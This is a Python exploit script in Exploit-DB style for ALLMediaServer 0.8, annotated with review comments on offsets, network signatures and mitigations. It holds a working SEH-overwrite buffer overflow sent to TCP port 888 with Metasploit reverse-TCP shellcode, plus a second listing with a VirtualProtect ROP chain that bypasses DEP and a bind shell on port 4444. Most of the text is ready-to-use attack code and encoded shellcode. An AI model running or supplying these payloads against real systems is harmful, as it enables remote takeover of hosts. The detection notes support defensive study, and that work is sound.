# Exploit Title: seh exploit, BOF
# Date: 04/07/2012
# Exploit Author: motaz reda
# my E-mail: motazkhodair@gmail.com
# Software Link: http://allmediaserver.org/
# Version: ALLMediaServer 0.8
# Tested On: Windows 7 ultimate
################################################
#!/usr/bin/python
#
# Review notes (what this listing does, for triage and detection):
#   - One unauthenticated TCP write to port 888 overflows a stack buffer and
#     overwrites the SEH record 1072 bytes into the input: NSEH at +1072,
#     handler address at +1076.
#   - All string literals below are byte payloads written for Python 2 str
#     semantics (one character == one byte); s.send() is handed a str.
#   - On the wire the payload is a long run of 0x41 ("A") bytes to TCP/888
#     followed by the 4-byte short jump "\xeb\x06\x90\x90" and a gadget
#     address -- a usable signature for a network sensor.
#   - NOTE(review): host-side controls that target SEH overwrites (SafeSEH /
#     SEHOP) and DEP are the relevant mitigations for the first listing; the
#     second listing appended by Exploit-DB adds a ROP chain that calls
#     VirtualProtect to work around DEP and depends on hard-coded gadget
#     addresses, i.e. on the named modules mapping at a fixed base.
import sys, socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Target host comes from argv[1]; there is no argument check, so running
# without one raises IndexError before any connection is made.
s.connect((sys.argv[1], 888))

buffer = "A" * 1072  # filler up to the SEH record
buffer += "\xeb\x06\x90\x90"  # NSEH: jmp short +6, skips over the handler address that follows
buffer += "\xca\x24\xec\x65"  # SEH handler: POP POP RETN gadget (0x65ec24ca, little-endian)
# msfpayload windows/shell_reverse_tcp
# you can replace the shellcode with any shellcode you want
# (per the author's note this is a reverse-TCP shell: the MediaServer
#  process would make an outbound connection after the exploit lands)
buffer += ("\xd9\xc8\xd9\x74\x24\xf4\xb8\xa6\xaa\xb6\xad\x5b\x2b\xc9\xb1"
"\x4f\x83\xeb\xfc\x31\x43\x15\x03\x43\x15\x44\x5f\x4a\x45\x01"
"\xa0\xb3\x96\x71\x28\x56\xa7\xa3\x4e\x12\x9a\x73\x04\x76\x17"
"\xf8\x48\x63\xac\x8c\x44\x84\x05\x3a\xb3\xab\x96\x8b\x7b\x67"
"\x54\x8a\x07\x7a\x89\x6c\x39\xb5\xdc\x6d\x7e\xa8\x2f\x3f\xd7"
"\xa6\x82\xaf\x5c\xfa\x1e\xce\xb2\x70\x1e\xa8\xb7\x47\xeb\x02"
"\xb9\x97\x44\x19\xf1\x0f\xee\x45\x22\x31\x23\x96\x1e\x78\x48"
"\x6c\xd4\x7b\x98\xbd\x15\x4a\xe4\x11\x28\x62\xe9\x68\x6c\x45"
"\x12\x1f\x86\xb5\xaf\x27\x5d\xc7\x6b\xa2\x40\x6f\xff\x14\xa1"
"\x91\x2c\xc2\x22\x9d\x99\x81\x6d\x82\x1c\x46\x06\xbe\x95\x69"
"\xc9\x36\xed\x4d\xcd\x13\xb5\xec\x54\xfe\x18\x11\x86\xa6\xc5"
"\xb7\xcc\x45\x11\xc1\x8e\x01\xd6\xff\x30\xd2\x70\x88\x43\xe0"
"\xdf\x22\xcc\x48\x97\xec\x0b\xae\x82\x48\x83\x51\x2d\xa8\x8d"
"\x95\x79\xf8\xa5\x3c\x02\x93\x35\xc0\xd7\x33\x66\x6e\x88\xf3"
"\xd6\xce\x78\x9b\x3c\xc1\xa7\xbb\x3e\x0b\xde\xfc\xa9\x74\x49"
"\x03\x3e\x1d\x88\x03\x2f\x81\x05\xe5\x25\x29\x40\xbe\xd1\xd0"
"\xc9\x34\x43\x1c\xc4\xdc\xe0\x8f\x83\x1c\x6e\xac\x1b\x4b\x27"
"\x02\x52\x19\xd5\x3d\xcc\x3f\x24\xdb\x37\xfb\xf3\x18\xb9\x02"
"\x71\x24\x9d\x14\x4f\xa5\x99\x40\x1f\xf0\x77\x3e\xd9\xaa\x39"
"\xe8\xb3\x01\x90\x7c\x45\x6a\x23\xfa\x4a\xa7\xd5\xe2\xfb\x1e"
"\xa0\x1d\x33\xf7\x24\x66\x29\x67\xca\xbd\xe9\x97\x81\x9f\x58"
"\x30\x4c\x4a\xd9\x5d\x6f\xa1\x1e\x58\xec\x43\xdf\x9f\xec\x26"
"\xda\xe4\xaa\xdb\x96\x75\x5f\xdb\x05\x75\x4a")
s.send(buffer)  # return value (bytes actually written) is not checked
s.close()

### Exploit-DB note:
### This affects AllMediaSErver 0.94 as well.

# Exploit-DB Note:
# Here's a ROP chain that will work on Windows 7 Pro Eng DEP AlwaysOn
# DEP/ASLR bypass with bind shell on port 4444
#
# NOTE(review): this second listing only builds `exploit`; nothing below
# opens a connection or transmits it, and the socket above is already
# closed. A bind shell on 4444 means a new listening port appearing on the
# host after traffic to 888 is the host-side indicator for this variant.
#
# Layout as the offsets below add up: 984 filler bytes, a 4-byte gadget
# address at +984, 88 more filler bytes, then `stackAdjust` at +1076 -- the
# SEH handler slot also used by the first listing. NOTE(review): the
# handler's add esp,800 pivot is commented as returning into the "Second
# ADD ESP" gadget placed at +984, which then lands in `rop`; inferred from
# the author's comments and offsets, not verified against the binary.
buffer = "\x41" * 984
buffer+= "\xe6\x30\x46\x00"  # Second ADD esp for stack adjustment
                             # add esp,90 | pop esi | pop ebx | retn ~ MediaServer.exe
buffer+= "\x41" * 88  # Step over SEH
stackAdjust = "\x9e\x6c\x42\x00"  # add esp,800 | pop ebx | retn ~ MediaServer.exe
                                  # Returns to Second ADD ESP
stackAdjust+= "\x42\x42\x42\x42" * 15  # Padding

# The chain below stages VirtualProtect's arguments in registers and then
# uses pushad to lay them out as a call frame (classic pushad technique).
# VirtualProtect into ESI
rop = "\x26\xfa\xf6\x65"  # pop eax | retn ~ avcodec-53.dll
rop+= "\xe0\xe4\x1e\x67"  # &kernel32.VirtualProtect ~ (import-table slot holding the pointer)
rop+= "\x54\xcd\xc6\x6a"  # mov eax,dword ptr ds:[eax] | retn ~ (dereference the slot)
rop+= "\x04\xef\x2e\x66"  # xchg eax,esi | retn ~ avcodec-53.dll
# Puts kernel32.VirtualProtect (the resolved address) into ESI
# lpAddress param into EBP
# NOTE(review): pushad pushes EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI, so after the
# two RETNs (EDI, then ESI = VirtualProtect) the call returns into EBP while
# the pushed ESP is what lands in the lpAddress slot; under that layout this
# jmp esp gadget is the post-call return target rather than lpAddress as the
# label says -- confirm.
rop+= "\xb3\x14\xb8\x68"  # pop ebp | retn ~
rop+= "\x07\x5d\x0c\x66"  # ROP jmp esp | ??? ~ avcodec-53.dll
# dwSize into EBX
rop+= "\x26\xfa\xf6\x65"  # pop eax | retn ~ avcodec-53.dll
rop+= "\xff\xfd\xff\xff"  # Will negate to 0x201 (value chosen to avoid null bytes)
rop+= "\xbe\x13\x6e\x66"  # neg eax | retn
rop+= "\x2b\xe2\xf4\x65"  # xchg eax,ebx | retn ~ avcodec-53.dll
# flNewProtect 0x40 into EDX
rop+= "\x26\xfa\xf6\x65"  # pop eax | retn ~ avcodec-53.dll
rop+= "\xc0\xff\xff\xff"  # Will negate to 0x40 (PAGE_EXECUTE_READWRITE)
rop+= "\xbe\x13\x6e\x66"  # neg eax | retn ~ avcodec-53.dll
rop+= "\x46\x08\x53\x66"  # xchg eax,edx | retn ~ avcodec-53.dll
# lpflOldProtect into ECX
rop+= "\x26\xfa\xf6\x65"  # pop eax | retn ~ avcodec-53.dll
rop+= "\x69\xef\x5f\x00"  # writeable address ~ avformat-53.dll
rop+= "\xeb\x9b\x74\x66"  # xchg eax,ecx | retn ~ avcodec-53.dll
# RETN into EDI
rop+= "\x84\xe6\x75\x66"  # pop edi | retn
rop+= "\x6d\x9b\xb2\x6a"  # retn ROP
# Nops in EAX
rop+= "\x26\xfa\xf6\x65"  # pop eax | retn ~ avcodec-53.dll
rop+= "\x90\x90\x90\x90"
# PushAD
rop+= "\x3a\x18\x75\x66"  # pushad | retn ~ avcodec-53.dll
rop+= "\x90\x90\x90\x90"
# Bind-shell payload per the Exploit-DB note above (port 4444).
shellcode =(
"\xba\x4b\xdb\xfb\xca\xdb\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x56\x31\x55\x13\x03\x55\x13\x83\xed\xb7\x39\x0e\x36"
"\xaf\x37\xf1\xc7\x2f\x28\x7b\x22\x1e\x7a\x1f\x26\x32\x4a"
"\x6b\x6a\xbe\x21\x39\x9f\x35\x47\x96\x90\xfe\xe2\xc0\x9f"
"\xff\xc2\xcc\x4c\xc3\x45\xb1\x8e\x17\xa6\x88\x40\x6a\xa7"
"\xcd\xbd\x84\xf5\x86\xca\x36\xea\xa3\x8f\x8a\x0b\x64\x84"
"\xb2\x73\x01\x5b\x46\xce\x08\x8c\xf6\x45\x42\x34\x7d\x01"
"\x73\x45\x52\x51\x4f\x0c\xdf\xa2\x3b\x8f\x09\xfb\xc4\xa1"
"\x75\x50\xfb\x0d\x78\xa8\x3b\xa9\x62\xdf\x37\xc9\x1f\xd8"
"\x83\xb3\xfb\x6d\x16\x13\x88\xd6\xf2\xa5\x5d\x80\x71\xa9"
"\x2a\xc6\xde\xae\xad\x0b\x55\xca\x26\xaa\xba\x5a\x7c\x89"
"\x1e\x06\x27\xb0\x07\xe2\x86\xcd\x58\x4a\x77\x68\x12\x79"
"\x6c\x0a\x79\x16\x41\x21\x82\xe6\xcd\x32\xf1\xd4\x52\xe9"
"\x9d\x54\x1b\x37\x59\x9a\x36\x8f\xf5\x65\xb8\xf0\xdc\xa1"
"\xec\xa0\x76\x03\x8c\x2a\x87\xac\x59\xfc\xd7\x02\x31\xbd"
"\x87\xe2\xe1\x55\xc2\xec\xde\x46\xed\x26\x69\x41\x23\x12"
"\x3a\x26\x46\xa4\xad\xea\xcf\x42\xa7\x02\x86\xdd\x5f\xe1"
"\xfd\xd5\xf8\x1a\xd4\x49\x51\x8d\x60\x84\x65\xb2\x70\x82"
"\xc6\x1f\xd8\x45\x9c\x73\xdd\x74\xa3\x59\x75\xfe\x9c\x0a"
"\x0f\x6e\x6f\xaa\x10\xbb\x07\x4f\x82\x20\xd7\x06\xbf\xfe"
"\x80\x4f\x71\xf7\x44\x62\x28\xa1\x7a\x7f\xac\x8a\x3e\xa4"
"\x0d\x14\xbf\x29\x29\x32\xaf\xf7\xb2\x7e\x9b\xa7\xe4\x28"
"\x75\x0e\x5f\x9b\x2f\xd8\x0c\x75\xa7\x9d\x7e\x46\xb1\xa1"
"\xaa\x30\x5d\x13\x03\x05\x62\x9c\xc3\x81\x1b\xc0\x73\x6d"
"\xf6\x40\x83\x24\x5a\xe0\x0c\xe1\x0f\xb0\x50\x12\xfa\xf7"
"\x6c\x91\x0e\x88\x8a\x89\x7b\x8d\xd7\x0d\x90\xff\x48\xf8"
"\x96\xac\x69\x29")
payload = buffer + stackAdjust + rop + shellcode
# Pad to a fixed total of 1765 bytes with 0xCC (int3). If the payload were
# ever longer than 1765, `rest` goes negative and the multiplication yields
# an empty string, so no padding is added and no error is raised.
rest = 1765 - len(payload)
exploit = payload + "\xCC" * rest
# Send exploit to target's port 888